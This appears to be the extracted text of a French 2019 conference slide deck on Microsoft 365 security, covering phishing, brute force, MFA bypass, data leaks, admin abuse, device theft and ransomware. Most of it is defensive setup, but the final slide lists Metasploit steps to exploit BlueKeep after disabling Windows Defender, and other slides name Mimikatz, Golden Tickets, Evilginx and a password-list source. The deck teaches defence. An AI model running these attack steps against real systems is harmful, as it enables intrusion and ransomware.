MWCP19 Cybersécurité et M365 en action

Guillaume Mathieu
Sébastien Paulet
Microsoft MVPs
Cybersécurité et
M365 en action
MODERN WORKPLACE
CONFERENCE PARIS 2019

MWCP 2019 - Thanks to our
Sponsors!

3
Enterprise Solutions
Architect
SPT Conseil
@SP_twit
Blog
sppublish.wordpress.com
Directeur Technique
Flexsi
Blog
http://msreport.free.fr
Guillaume Mathieu & @SP_twit #MWCP19

Microsoft 365
Windows Office 365 EM+S
S Guillaume Mathieu & @SP_twit #MWCP19

Office 365
S
Groups
Teams Yammer
OneDrive
SHAREPOINT EXCHANGE
Planner

S
Power Plateform
Power BI Power Apps Power Automate
Office Pro Plus
Word PowerPoint Excel Notes
Office 365 (suite)
Autres
Forms Stream

Enterprise Mobility + Security
G Guillaume Mathieu & @SP_twit #MWCP19
• Azure Active Directory Premium
• Azure MFA
• Azure Advanced Protection
• Microsoft Cloud App Security
• Azure Information Protection Premium
• Azure Right Management Premium
• Intune

O365 repose sur Azure
Office 365 (SaaS)
Azure (IaaS)

Gestion de l’identité – Azure Active Directory

Sécurité (Etats-Unis)

Sécurité (France)
280 jours : délais pour détecter une attaque
63 jours : délais pour s’en remettre
20 minutes (NotPetya) : 2000 machines, 100 serveurs, sauvegardes HS
81 % : les entreprises Françaises ciblées par une attaque informatique (probablement plus).
35 % : source de l’incident de sécurité, l’équipe IT
800000 euros : prix (moyenne) pour s’en remettre

Au programme aujourd’hui
• Arnaque au président
• Attaque brute force
• Contournement du MFA
• Fuite de données
• Abus de privilèges
• Vol/perte de terminal
• Cryptolocker
• Suivi
• Et Microsoft?

18
Incident #1
Arnaque aux présidents
(phishing)

Simuler une attaque avec Office 365 Attack Simulator

Le cocktail SPF, DMARC, DKIM
• SPF -> Origine
• vérification IP/domaine envoie du mail (déclaration DNS)
• Configuré par défaut si 100% Online
v=spf1 include:spf.protection.outlook.com -all
• Admin centrale tenant > Configurer > Domaine
• Voir https://docs.microsoft.com/fr-fr/microsoft-365/security/office-365-
security/set-up-spf-in-office-365-to-help-prevent-spoofing
Guillaume Mathieu & @SP_twit #MWCP19S

• DKIM -> Intégrité
• signature du mail (clé publique dans le DNS du domaine)
Déclarer les CNAME dans Admin tenant >
Configurer > Domaines
avec pour les noms d’hôte (Ajout CNAME)
selector1._domainkey
selector2._domainkey
#Depuis le Microsoft Exchange Online Powershell module
PS > Connect-EXOPSSession #Connexion Exchange Online Pshell Module
PS > Get-DkimSigningConfig -Identity <custom domain> | fl Selector1CNAME,
Selector2CNAME
PS > Set-DkimSigningConfig -Identity
<custom domain> -Enabled $true
S

• DMARC -> Vérification du « Friendly-from » ie MailFrom(5321) = From(5322)
• définition du comportement en cas d’échec SPF et DKIM
• Déjà géré sur les mails entrants
• Pour les mails sortants, modification du DNS (Ajout « TXT »):
• Rien faire: _dmarc.<domaine> 3600 IN TXT "v=DMARC1;
p=none"
• Mise en quarantaine : _dmarc.<domaine> 3600 IN TXT
"v=DMARC1; p=quarantine"
• Rejet : _dmarc.<domaine> 3600 IN TXT "v=DMARC1;
p=reject"
S

Exchange Online Protection (EOP)
• Fonctionnalité inclue dans O365. Add-on pour Exchange On-Premise
• Mails entrants:
• Filtre
• Antivirus
• Policies check
• Anti Spam
• Si ATP, ATP
• Delivery

Exchange Online Protection (EOP)
• Mails sortants:
• Antivirus
• Policies check
• Anti Spam
• Score
• Delivery

Office 365 ATP – Safe Links

Office 365 ATP – Safe Links
• Retour d’expérience
• Réécriture d’URL → attention aux
campagnes marketing de la société !
https://fra01.safelinks.protection.outlook.com/?url=https
%3A%2F%2Fleblogosd.wuibaille.fr%2F&data=02%7C01%7
Cmelanie.mathieu%40flexi.msreport.fr%7C7faf54252d0f4
d687ded08d77b04f4b0%7C2e609e7429a14af3b552f9ee8
23c868a%7C1%7C0%7C637113133514350121&sdata=ne
XyaMJSEbmWlgB7NaBnyYDspzHJcfnqPg7ezB1h%2B08%3
D&reserved=0
• Possibilité d’interdire URL / autoriser des
URL sans inspection
• Astuce : faire un clic droit puis Copy link
address dans le navigateur
• A activer progressivement.

SafeLinks dans Teams

Anti phishing avec Office 365 ATP
• Protection contre l’usurpation de domaine ou mails en particulier
• Définition de stratégies Centre de sécurité > Gestion des menaces >
Stratégie
• Protection d’adresse usurpables (max 60)
• Possibilité d’activer du ML (boite intelligente) pour améliorer le
filtrage

Anti phishing avec Office 365 ATP
• Retour d’expérience :
• 30 minutes pour s’appliquer
• On indique les boîtes aux
lettres sensibles dont
l'identité peut être usurpée.
On ne sélectionne pas les
BAL qui doivent être
protégées !
• Les boîtes aux lettres
sensibles peuvent être
internes ou externes.
Guillaume Mathieu & @SP_twit #MWCP19G

Office 365 ATP – Safe attachments

Audit de config ATP avec ORCA
• Office 365 Advanced Threat Protection Recommended Configuration
Analyzer (ORCA) – Recommandation des devs et experts MS
• Voir aussi
https://docs.microsoft.com/
en-us/microsoft-365/security/
office-365-security/
recommended-settings-for-eop-
and-office365-atp
PS > Install-Module -Name ORCA #Dans Pshell avec admin rights
PS > Get-ORCAReport #Dans Exchange Online Powershell Module
S

En résumé
• Sans EMS :
• SFP, DKIM, DMARC
• Filtrage par défaut avec EOP
• Possibilité de définir des strategies
• Avec EMS
• Safe Links
• Safe Attachments
• Protection domaines et BAL avec ATP

34
Incident #2
Attaque brute force

Attaquer un mot de passe
• Password spray
• Brute force
• Achat de base utilisateurs (62% des utilisateurs réutilisent)
• Phishing
• Keylog
• Mdp écrits
• Extorsion

Simuler une attaque Spray/Brute Force (O365 E5)
• Here are the top 10 we are seeing in guessing attacks on our system:
• 123456
• password
• 000000
• 1qaz2wsx
• a123456
• abc123
• abcd1234
• 1234qwer
• qwe123
• 123qwe

Simuler une attaque Spray/Brute Force (O365 E5)
• Retours d’expériences :
• Fichier avec 10 millions de mot de passe : 8,13 Mo
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/C
ommon-Credentials/10-million-password-list-top-1000000.txt
• La cible doit avoir une boîte aux lettres Office 365
• Hard Return entre les lignes (pas de SHIFT + entrée)
• Taille du fichier avec les mots de passe : 10 Mo
En pratique, fonctionne uniquement avec un petit nombre de mots de passe.
• Lent
• Documentation : https://docs.microsoft.com/en-us/microsoft-
365/security/office-365-security/attack-simulator#brute-force-password-attack
Guillaume Mathieu & @SP_twit #MWCP19SG

Le SSPR (Self Service Password Reset)
• Utilisateur In Cloud :
• Changement du mot de passe
Azure AD uniquement.
• Licence Office 365 ou Azure
Free.
• Changement du mot de passe
via My Account
https://account.activedirectory
.windowsazure.com/ChangePa
ssword.aspx
S Guillaume Mathieu & @SP_twit #MWCP19G

• Utilisateur synchronisé :
• Licence Azure AD Premium P1 requise
• Définir son profil SSPR : http://aka.ms/ssprsetup
• Réinitialisation du mot de passe : http://aka.ms/sspr ou My Account
(https://account.activedirectory.windowsazure.com/ChangePassword.aspx)
• Durée de vie minimale du mot de passe AD : 0 jour

• Utilisateur synchronisé (suite) :
• Azure AD Connect configuré pour le Write Back des mots de passe.
• Stratégie de mot de passe AD = stratégie de mot de passe Azure AD
• Stratégie de mots de passe Azure AD → ignoré pour un compte synchronisé
Option à activer au niveau du Tenant Azure AD :
Set-ADSyncAADCompanyFeature -ForcePasswordResetOnLogonFeature $True
-ConnectorName msreportacademy.onmicrosoft.com -AAD
• Option Azure AD Connect : activer synchroniser « Password must be changed
at next logon »
Set-MsolDirSyncFeature -Feature
EnforceCloudPasswordPolicyForPasswordSyncedUsers

Azure AD Password Protection

Azure AD Password Protection
• Déploiement
• https://docs.microsoft.com/en-us/azure/active-directory/authentication/howto-
password-ban-bad-on-premises-deploy
• Agent à déployer sur tous les contrôleurs de domaine (Passfit.dll)
• Les DC n’ont pas besoin d’avoir un accès Internet.
• Licences Azure AD Premium P1, P2 sauf pour les comptes Cloud Only sans liste de
mot de passe interdit.
• Maximum 1000 mots de passe interdits personnalisés. L’outil prend en charge les
variantes de mots de passe.
• Liste de mots de passe interdits = liste globale générée via Azure AD Identity
Protection + liste personnalisée.
• Incompatible avec l’agent Azure AD Application Proxy.

Preview : l’utilisateur vérifie lui-même ses données de connexion
Via le portail : https://mysignins.microsoft.com ou https://myprofile.microsoft.com/
S

Preview : l’utilisateur vérifie lui-même ses données de connexion
Via le portail Azure AD (https://portal.azure.com) dans le contexte d’un compte standard
S

AD Smart Lock / IP Smart Lock
• Si AD : Fonctionne uniquement si les Hash sont synchronisés dans le Cloud
• Par défaut: verrouillage de 60 secondes après 10 tentatives KO
• Activation par https://aad.portal.azure.com/ > Sécurité

AD Smart Lock / IP Smart Lock
• Même problématique que le verrouillage des comptes AD.
• Peut être détourné pour faire une attaque de type dénie de service si les
seuils de verrouillage de comptes sont trop bas ou si la durée de verrouillage
est trop importante.

MFA « simple »
• Inclus avec Office 365
• Configurer le cache de
session / méthode
d’authentification.
• Conditionnal Access avec
ADFS : Skip multi-factor
authentication for
requests from federated
Users
• Garder un compte
admin sans MFA (Glass
breaker) avec mot de
passe aléatoire de 20
caractères minimum.

#General : PowerShell sur Microsoft 365
#Ajout de la PowerSehll Gallery en zone de confiance
PS > Set-PSRepository -Name PSGallery -InstallationPolicy Trusted
PS > Install-Module MSOnline #O365
PS > Install-Module AzureAD –Repository PSGallery #Azure AD
PS > Install-Module Microsoft.Online.SharePoint.PowerShell #SharePoint
PS > Install-Module MicrosoftTeams #Teams
S
• Retour d’expériences :
• 1 module PowerShell pour tous les services Office 365.
• 2 modules PowerShell pour Azure : MsOnline et AzureAD.
Les 2 sont complémentaires.
• Nouveau module PowerShell pour Exchange (pour authentification moderne /
MFA).
G

#General : Powershell sur Microsoft 365
• Installer le module PowerShell Exchange Online V1 (solution 1) :
• Utiliser le lien depuis Exchange Online Admin Center | hybrid.
Utiliser Internet Explorer comme navigateur pour le téléchargement !
PS > Connect-EXOPSSession
#Connexion Exchange Online
PS > Connect-IPPSSession
#Connexion centre de Sécurité
et Conformité
S

#General : PowerShell sur Microsoft 365
• Installer le module Exchange Online V2 (solution 2) :
• Suivre la procédure Microsoft :
https://docs.microsoft.com/en-us/powershell/exchange/exchange-
online/exchange-online-powershell-v2/exchange-online-powershell-
v2?view=exchange-ps
Fermer PowerShell après installation forcée de PowerShellGet.
PS > Install-Module PowershellGet -Force #Installation POwerShell Get
PS > Set-ExecutionPolicy RemoteSigned
PS > Install-Module -Name ExchangeOnlineManagement #Installation du module
Exchange V2
PS > Connect-ExchangeOnline #Connexion Exchange Online
S

Activation ADAL
• Activé par défaut uniquement sur les tenants récents.
• Prérequis pour le MFA avec les clients lourd (Outlook, Word, Excel…)
• Plus besoin de ressaisir le mot de passe dans Outlook en mode fédéré
(ADFS…).
• Prérequis pour désactiver les anciens (Legacy) protocoles d’authentification
Exchange Online.
PS > Connect-EXOPSSession #Exchange Online Powershell module
PS > Set-OrganizationConfig -OAuth2ClientProfileEnabled $true #30 minutes
to apply
PS > Get-OrganizationConfig | Format-Table Name,OAuth* -Auto
#Vérification

Désactivation des protocoles « Legacy »
Microsoft désactivera les
protocoles d’authentification
basiques (sauf SMTP) dés
Octobre 2020
Protocol / service Paramètre (pour les Policies)
Exchange Active Sync (EAS) AllowBasicAuthActiveSync
Autodiscover AllowBasicAuthAutodiscover
IMAP4 AllowBasicAuthImap
MAPI over HTTP (MAPI/HTTP) AllowBasicAuthMapi
Offline Address Book (OAB) AllowBasicAuthOfflineAddressBook
Outlook Service AllowBasicAuthOutlookService
POP3 AllowBasicAuthPop
Reporting Web Services AllowBasicAuthReportingWebServices
Outlook Anywhere (RPC over HTTP) AllowBasicAuthRpc
Authenticated SMTP AllowBasicAuthSmtp
Exchange Web Services (EWS) AllowBasicAuthWebServices
PowerShell AllowBasicAuthPowerShell

Désactivation des protocoles « Legacy »
• Désactivation avec PowerShell :
PS > Connect-EXOPSSession #Connexion
Exchange Online Pshell Module
PS > Set-CASMailbox -Identity
mwcpdemo01@contoso.com -ImapEnabled
$false -PopEnabled $false -
ActiveSyncEnabled $false

Désactivation des protocoles « legacy »
S
• Désactivation par stratégie
PS > New-AuthenticationPolicy –Name "Strict no basic auth" #enable ADAL before!
PS > New-AuthenticationPolicy -Name "Allow Outlook Desktop" -AllowBasicAuthImap -
AllowBasicAuthWebServices #if I need to run Outlook without Modern Auth
PS > Set-User -Identity mwcpdemo01@contoso.com -AuthenticationPolicy "Strict no basic
auth“ #Apply at user level (for test and exceptions)
PS > Set-User -Identity mwcpdemo01@contoso.com -STSRefreshTokensValidFrom
$([System.DateTime]::UtcNow) #force to apply policy under 30 minutes (/24 hours)
PS > Set-User -Identity mwcpdemo01@contoso.com -AuthenticationPolicy $null #Clear
user policy
PS > Set-OrganizationConfig -DefaultAuthenticationPolicy "Strict no basic auth"
#Apply at org level

• Désactivation par accès conditionnel :
• Nécessite Aure AD Premium P1

• Désactivation par stratégie d’accès conditionnel :
• Nécessite Aure AD Premium P1
• Azure AD > Accès conditionnel > Stratégie > Baseline policy: End User protection
• S’applique à tout le Tenant -> pour les environnements complexes, utiliser une
stratégie personnalisée !

Activation des logs Exchange Online
• Activé par défaut
• Nécessite O365 E5 pour voir l’audit depuis le centre de sécurité et
conformité https://protection.office.com/unifiedauditlog
PS > Get-OrganizationConfig | Format-List AuditDisabled #False is OK

Activation des logs O365
• Désactivé par défaut
• Centre Sécurité et Conformité
> Rechercher > Rechercher
dans le journal d’audit
• Conservation 90 jours
• Extension à 365 jours
à venir 12/2019 pour
comptes E5 (#56794)
PS > Set-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $true

MFA selon règle d’accès conditionnel
• Réduire le nombre de demandes MFA.
• Licences Azure AD Premium P1 ou Azure AD Premium P2 (pour Sign Risk)
• Assignations à des utilisateurs, groupes, rôles (Preview)
• Définition de conditions et de règles d’accès.
G

MFA selon règle d’accès conditionnel
• Retours d’expérience :
• Désactiver le MFA pour tous les utilisateurs au niveau d’Azure MFA → conflit
avec les règles d’accès conditionnels dans le cas contraire.
Attack Simulator : créer un compte dédié pour cette action car Azure MFA doit
être activé !
• Condition Sign Risks → s’appuie sur Azure AD Identity Protection.
• Impacts potentiels si utilisation des règles par défaut (pas de ciblage).
• Scénarios à privilégier / implémenter :
• MFA uniquement pour les machines non gérées (licence Azure AD P1)
Nécessite de configurer les machines Windows en mode Hybride Join.
• MFA sur détection de risques (licences Azure AD P2)

MFA pour les machines non gérées
• Les types de périphériques Azure AD :
• Azure registred (workplace join)
• Azure AD Join : machine jointe à Azure Active Directory
• AD Domain Join : machine jointe à un domaine Active Directory
• Hybrid Join : machine jointe à un domaine Active Directory avec synchronisation du compte
ordinateur sous forme d’un MSolDevice.
Nécessite une configuration spécifique d’Azure AD Connect.
G

G
• Configuration de la machine :
• Une machine ne
peut pas être à la
fois Azure AD
Domain Join et AD
join !

G
• Spécificités machines Azure AD Join :
• Pour des donner des
permissions à un compte
Azure AD :
• Impossible via l’interface
graphique
• Nécessite ICACLS :
icacls "C:yourpath" /t
/grant azureadFirstLast:M

G
• Configuration Hybride Join via Azure AD Connect

MFA en cas de détection de risque
• Retour d’expériences :
• Licences Azure AD Premium P2 requise.
• S’appuie sur Azure AD Identity Protection.
• Simulation : utilisation de Tor Browser avec le compte
melanie.bertrand@flexi.msreport.fr
G

Azure AD comme IDP
• Objectifs
• Provisionner automatiquement les applications SaaS.
• Réduire le nombre de login / mot de passe. Azure AD va jouer le rôle d’IDP
(comme ADFS, Ping Federate).
• Quelques définitions :
• IdP : Identity Provider (l’Azure AD IDP)
• SP : Service Provider (le service pour lequel l’utilisateur veut se connecter)
• SCIM (System for Cross Domain Identity Management) : permet de créer, modifier
et supprimer les identités des applications SaaS.
• SAML (Security assertion markup language) : protocole de fédération d’identité
G

Azure AD comme IDP : exemple avec ServiceNow
G

En résumé
• Activer la librairie ADAL pour Exchange Online / SharePoint Online et bloquer
les anciens protocoles (POP, IMAP…)
• Sans EMS
• Mots de passe complexes et MFA (accès conditionnel basique si ADFS).
• Analyse de logs Exchange et O365
• Réduire le nombre de logins / mots de passe (Azure AD comme IDP).
Maximum 10 applications au niveau du Tenant Azure AD / Office 365
• Avec EMS
• SSPR
• MFA selon emplacement géographique, applications, risques, machine
gérée ou non.
• Liste personnalisée de mots de passe interdits.
• Azure Identity protection protège contre les attaques.
• Réduire le nombre de logins / mots de passe (Azure AD comme IDP)
Pas de limite dans le nombre d’applications.

70
Incident #3
Contournement du
MFA

Channel jacking

Demandez lui …
Jack Dorsey, CEO Twitter. Piraté par SIM SWAP en Aout 2019

L’attaque Man In The Middle sur MFA
Utilisateur
4
2FA

Exemple de MITM MFA : EvilGinx

Filtrer les pays

Le PasswordLess
G
• Quelques protocoles à connaître :
• OATH (Initiative for Open Authentication) : groupe de collaboration
international qui vise à promouvoir l’authentification forte en open-
source.
• OTP : One Time Password
• TOTP : Time based One Time Password
Google Authenticator et Microsoft Authenticatior utilisent le protocole
TOTP
• FIDO 2 (Fast Identity Online) :
Basé sur les protocoles Client to Authenticator Protocol (CTAP) et W3C
WebAuthn.

PasswordLess avec Authenticator (preview)
• Activation dans Azure AD

PasswordLess avec Authenticator
• Coté utilisateur, aller sur https://aka.ms/mysecurityinfo pour
paramétrer Authenticator (nécessite l’enregistrement du téléphone)
• Ne résout pas les attaques MitM

Démo : PasswordLess clés FIDO2 (Yubikey)

Authentification par SMS
• Pour les « ForstLine Workers », possibilité d’authentification sans mot
de passe, directement par envoie de SMS

En résumé
• MFA n’est pas 100% sûr
• Tenir les antivirus à jour pour éviter les movement latéraux
• Avec EMS
• Bloquer le phishing initial avec Office 365 ATP
• Filtrer les pays si possible
• Passwordless en 2020

84
Incident #4
Fuite de données
(utilisateur ou vol)

La menace intérieure
Source : Haystax Insider threat report 2019

La menace intérieure

Protection des données / RMS
• IRM sur O365 (à partir de licence E3)
• Faire porter les permissions définies au
niveau de SharePoint sur le document.
• Système de clef publique/clef privé et
un chiffrement des documents à la
volée (clés publiques RSA 2048 bits, et
SHA-256 pour les signtaures)
• Lire https://docs.microsoft.com/fr-fr/information-protection/understand-explore/how-does-it-work
• Système cassable dés lors qu’on a les droits en View Only https://github.com/RUB-NDS/MS-RMS-Attacks

Protection des données / RMS

Etiquettes de confidentialités
• Office 365 E3 requis
• Disponible in Outlook, SharePoint, OWA and O365 Pro Plus clients
@SP_twit #aOSKL

Etiquettes de confidentialités - Effets
• Chiffrement des fichiers
-> Impossible à ouvrir pour les utilisateurs non autorisés
/ non authentifiés
• Restriction des permissions
-> Désactivation du copier-coller, impression, capture
d’écran, transfert de mails , etc.
• Watermarking
-> sur les fichiers Word
• Bloquage de la copie sur clef USB / PJ sur services non O365
-> RequiereWIP (Windows Information Protection) et
Intune
@SP_twit #aOSKL

Création d’étiquettes de confidentialité
• En tant qu’admin de tenant, section
« Sécurité et conformité »
• Dans le centre de sécurité et conformité,
aller dans « Classification » >
« Etiquettes de confidentialité »
• Cliquer sur « Créer une étiquette »
@SP_twit #aOSKL

Publication d’étiquettes de confidentialité
• Dans le centre de sécurité et conformité, aller dans « Classification »
> « Etiquettes de confidentialité »
• Cliquer sur « Stratégie des étiquettes»
@SP_twit #aOSKL

Nouveauté à venir sur les Labels
• Etiquettes disponibles dans tous les clients (Web ou Pro Plus)
• Support des fonctionnalités Search, OWA, co-édition et eDiscovery
pour les documents chiffrés
• Association d’étiquette de confidentialité aux
Teams/GroupeO365/Sites
• Support des PDF protégés
dans Edge

Application automatique d’étiquettes avec les DLP
• Office 365 E5 requis
• Data Loss Prevention
• Basé sur des expressions régulières
(RegEx) ou dictionnaires
• Peut aussi provoquer des
avertissements ou des blocages de
fichiers
• Compter 7 jours après publication
pour l’application automatique

Application automatique d’étiquettes avec les DLP
• Intune requis
• Bloque la copie sur
périphériques non
autorisés et envoi vers
services non reconnus
• Config:
• Créer/publier les étiquettes
• Config Microsoft Defender
ATP
• Créer une stratégie WIP
avec Intune ou SCCM

Label Auto Apply
• Détection désormais en temps réel lors de la saisie dans Office Pro
Plus
• Application du label ou recommandation d’appliquer

Trainable classifiers
• Application des étiquettes par Machine Learning
• Utilisation des critères existants ou création de critères propres
(50 à 500 contenus pour apprendre et 10.000 pour les tests).

Insider Risk Management
• Détection des comportements anormaux dans la durée des
utilisateurs
• API Graph + Playbooks configurables + Machine Learning

Gestion des extérieurs
• Activable /OneDrive / SiteCollections /Teams
• Possibilité de restreindre à des domaines
• Possibilité de MFA pour les extérieurs (attribution de licences Azure
AD Premium P1 + Azure MFA) via Azure AD ou Conditional Access.
(Non testé avec OTP?)

Utilisateurs extérieurs – Liens anonymes
• A désactiver !
• Gestion globale via Central Admin SharePoint > Stratégies > Partage

• Gestion des SharePoint (et Teams) depuis la central admin SharePoint
> Sites > Sites Actifs > <site> > partage externe

• Gestion des OneDrive depuis la central admin du tenant > Utilisateurs
> Utilisateurs Actifs > <user> > Gérer le partage externe

Obtenir les IP des accès anonymes
Script de Tony Redmond sur https://www.petri.com/tracking-
anonymous-access-sharepoint-onedrive-documents

Annonces pour la gestion des extérieurs
• Bloquer le partage en lien anonymes des fichiers sensibles
• Bloquer le téléchargement des fichiers dans les liens anonymes pour
tous les formats supportés par OWA
• Limiter dans le temps les accès aux
utilisateurs externes authentifiés

Désactivation du transfert automatique de mails
• Dans Exchange Online Powershell Module
<# Efface les forward existants #>
PS > $AllForwards = Get-Mailbox -ResultSize Unlimited -Filter
{(RecipientTypeDetails -ne "DiscoveryMailbox") -and
((ForwardingSmtpAddress -ne $null) -or (ForwardingAddress -ne $null))} |
Select Identity
PS > $AllForwards | % {Set-Mailbox -Identity $_.Identity -
ForwardingSmtpAddress $null -ForwardingAddress $null}
<# Desactive la possibilité de créer des forwards #>
PS > Set-RemoteDomain Default -AutoForwardEnabled $false

Le CASB avec Cloud App Security
• Licence EMS E5 requise
• Permet l’analyse des logs pare feu / proxy pour détecter les
applications SaaS non autorisées.
• Portail : https://portal.cloudappsecurity.com/

MIM 2016
• MIM 2016 est une suite de produits :
• MIM Synchronisation Service : moteur de synchronisation avec de nombreux
connecteurs
• MIM portal + MIM Services + MIMWALL : moteur de workflow, portail web
• BHOLD : remplacé par Azure AD Access Review
• MIM 2016 Certificate Management : gestion des certificats
• PAM : gestion des comptes à fort privilèges
• Azure AD Connect est une version dérivée de MIM Service et MIM
Synchronisation Service
• MIM Synchronization Service ne nécessite pas l’achat de licences !
https://social.technet.microsoft.com/wiki/contents/articles/2487.ho
w-to-license-fim-2010-and-mim-2016.aspx

MIM 2016
G
Management Agent : connecteur MIM Synchronization Service (AD, SQL, fichier texte, LDAP…).
Connecteur space : copie en lecture seule du contenu d’un connecteur (AD, SQL…).
Import : le contenu du système cible est copié dans le connecteur space.
Export : le contenu du connecteur space est copié dans le système cible.

MIM 2016
• Les actions effectuées lors d’une FULL Synchronization :
• Filter/Delete : les objets filtrés sont chargés dans le connecteur space du Management
Agent (pas dans la Metaverse).
• Join : permet d’associer un objet du connecteur space avec un objet de la Metaverse selon
une règle de jointure.
Exemple : ExtensionAttribute1 du connecteur space AD = EmployeeID de la Metaverse)
• Projection : création d’une entrée dans la Metaverse à partir d’un objet d’un connecteur
space.
• Provision : création d’une entrée dans un connecteur space à partir d’un objet de la
Metaverse.
Cette opération nécessite l’écriture d’une Metaverse Rule.
Cette dernière est une DLL qui doit être écrite en VBNET ou en C#.
• Import Attributes Flow (IAF) : application des règles de synchronisation connecteur space
Metaverse.
Les règles de transformation complexes nécessitent le développement d’une Rule Extension.
Cette dernière est une DLL écrite en VBNET ou en C#.
• Export Attributes Flow (EAF) : application des règles de synchronisation connecteur space
Metaverse.
Les règles de transformation complexes nécessitent le développement d’une Rule Extension.
Cette dernière est une DLL écrite en VBNET ou en C#.
G

Azure AD Access Package
• Permet de créer des groupements de ressources.
• Les utilisateurs demandent l’accès aux Access Package avec / sans
approbation.
• Portail de demande : https://myaccess.microsoft.com
• Licences Azure AD Premium P2 requis.

Azure AD Access Review
• Permet de certifier les accès des utilisateurs.
• Licences Azure AD Premium P2 requis.

En résumé
• Sans EMS :
• Utiliser les étiquettes de confidentialités et faites les utiliser (peut nécessiter EMS)
• Gérer finement les utilisateurs externes
• Désactiver les forward de mails
• Créer, modifier, supprimer les identités et les comptes utilisateurs associés avec
MIM 2016Synchronization Service (licence Windows Server requise).
• Avec EMS :
• Utiliser Microsoft Cloud App Security pour détecter le Shadow IT (applications
SaaS non autorisées).
• Créer, modifier, supprimer les identités et les comptes utilisateurs associés avec
MIM 2016 (avec le portail MIM).
• Certifier les accès de vos utilisateurs avec Azure AD Access Review.
• Gérer l’accès à vos ressources avec Azure AD Access Package.
• Insider Risk Management à venir

113
Incident #5
Fuite de la part des
admins

Cet homme était admin SharePoint

La menace IT

POLP – Principe de moindre privilèges appliqué à
l’admin M365
Meilleures sécurité (Snowden n’avait besoin que de faire
des backups)
Minimisation de la surface d’attaques extérieures
Limitation de la propagation des virus

Recommandations générales
• Comptes administration nominatifs.
• De 2 à 4 comptes d’admin généraux MAX
• Compte(s) brise-glace (20+ chars mdp, renouvellement de MDP
après usage et sur base périodique).
• Machines dédiées pour utiliser les comptes admin
• MFA/Passwordless obligatoire
• Délégation de droits selon le principe du moindre privilège.
G

Principaux rôles d’administration
• Administrateur des données de conformité (eDiscovery)
• Administrateur global
• Administrateur de sécurité
• Administrateur de rôle privilégié
• Administrateur d’utilisateurs
• Administrateur Exchange
• Administrateur SharePoint
• Administrateur Teams
• Administrateur du support technique (réinitialisation de mots de passe)
• Administrateur de facturation

Liste des comptes avec des rôles à forts privilèges

Liste des comptes avec des rôles à forts privilèges
PS > #Requires AzureAD or AzureADPreview module
PS > Connect-MsolService
PS > Get-MsolRole | %{ $roleName = $_.Name; Get-MsolRoleMember
-RoleObjectId $_.ObjectId | select DisplayName, EmailAddress, @{Name =
'O365Role'; Expression = {$roleName}}}

Azure AD Privileged Identity Management (PIM)
• Licences Azure AD Premium P2
• Just In Time Access : les administrateurs doivent demander un accès
temporaire aux rôles à fort privilèges.

Office 365 Privileged Access Management
• Complémentaire avec PIM
• Exchange Online uniquement.
• Permet de bloquer des commandes comme Search-Mailbox pour des
administrateurs de type Organization Management.

Créer des alertes

Auditer les actions admins Exchange
• EAC > Gestion de conformité > Audit > Exécuter un rapport d’accès
aux BAL par les non propriétaires

En résumé
• Sans EMS :
• POLP
• Création d’alertes
• Audit des logs
• Avec EMS :
• Mise en œuvre d’Azure AD Privileged Identity Management (PIM)
• Mise en œuvre d’Office 365 Privileged Access Management

126
Incident #6
Perte / vol de terminal

Vol ou perte de terminal

Elévation de privilèges → administrateur local
G
• Comment devenir
administrateur local
sur une machine
non chiffrée ?

Elévation de privilèges → administrateur du domaine
G
• Comment devenir
administrateur du
domaine quand on
est administrateur
local d’une
machine ?

BitLocker avec sauvegarde des clés dans Azure AD
G
Forcer avec Intune :
https://blog.ctglobalservices.com/windows-client/mas/how-to-manage-bitlocker-on-a-azure-ad-joined-
windows-10-device-managed-by-intune/#post/0

MDM / MAM
• System Center Configuration Manager
(SCCM)
• « vieux »
• Pour Windows
• Part de la suite System Center
• Intégrable dans Intune
• MDM pour O365
• Inclue dans O365 suscriptions
• Compatible iOS, Andoid, Windows
• Security policies (password requirement)
• Remote wipe
• Microsoft Intune
• MDM complet
• Inclue dans EMS ou à part
• Fait MDM pour O365
• + Mac OS
• + Déploiement d’Apps
• + In App policies (retrict copie
/coller)

ActiveSync pour la suppression des terminaux à
distance par l’admin
• Centre d’administration Exchange Online
• > Destinataire
• > <user>
• > Périphériques mobiles
• > Afficher les détails
• > <device>
• > Effacer les données
PS > Get-MobileDevice -Mailbox <user> | select Id
PS > Clear-MobileDevice -Identity <device Id> -NotificationEmailAddresses
"admin@contoso.com" # -AccountOnly pour seulement la BAL

ActiveSync pour la suppression des terminaux à
distance par l’utilisateur
• Depuis interface Outlook > Paramètres > Afficher tous
les paramètres d’Outlook
• Général > Appareils mobiles > <appareil> > Effacer

Préparation d’Intune
• https://portal.azure.com/#blade/Microsoft_Intune_DeviceSettings/E
xtensionLandingBlade/overview
S

Ajout de périphérique manuellement
• L’auto enroll (ajout automatique de périphérique lors de l’ajout du
compte sur la machine –
nécessite Azure AD Premium P1)
• Paramètres
> Accès Professionnel ou Scolaire
> <compte utilisateur>
> S’inscrire uniquement à la gestion
des péripériques

Suppression de terminal à distance avec Intune
• Portail Azure > Intune > Rechercher un appareil > <appareil> >
Réinitialiser
S

EndPoint Manager
MDM / MAM sur M365
S
MDM
SCCM InTune

Microsoft EndPoint Manager
• Vue consolidée de tous les périphériques
• Score de productivité
• Recommandations de sécurité
• https://devicemanagement.microsoft.com

Suppression de terminal à distance depuis
EndPoint Manager
• https://devicemanagement.microsoft.com/
S

En résumé
• Sans EMS :
• Suppression des données à distance via MDM
• Bitlocker les disques avec sauvegarde des clés dans Active Directory ou Azure
Active Directory
• Avec EMS :
• Suppression des données à distance via Intune

141
Incident #7
Cryptolocker et
ransomwares

Fonctionnement d’un cryptolocker
• La méthodologie :
• Une faille applicative pour devenir administrateur local (comme BlueKeep)
• Elévation des privilèges pour se propager sur des machines seines avec un
outil comme Mimikatz.
• Chiffrement des données.
• Génération d’un Golden Ticket pour revenir si besoin avec DSINternals et
Mimikatz.

Metasploit : exploitation de la faille Bluekeep
• Téléchargement de Metasploit :
• Gratuit pour la version communauté :
• https://github.com/rapid7/metasploit-
framework/wiki/Nightly-Installers
• La procédure avec Metasploit :
• https://headleaks.com/2019/11/11/how-hackers-exploit-
bluekeep-vulnerability-to-install-cryptominer-on-windows-
servers-YWEvR1Z3eCtWS0ZpZllxc2ZzUDdyQT09
• Procédures d’attaque :
Désactiver Windows Defender (via GPEDIT).
Lancer l’outil C:metasploit-
frameworkbinmsfconsole.bat
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show options
set RHOSTS 192.168.140.129
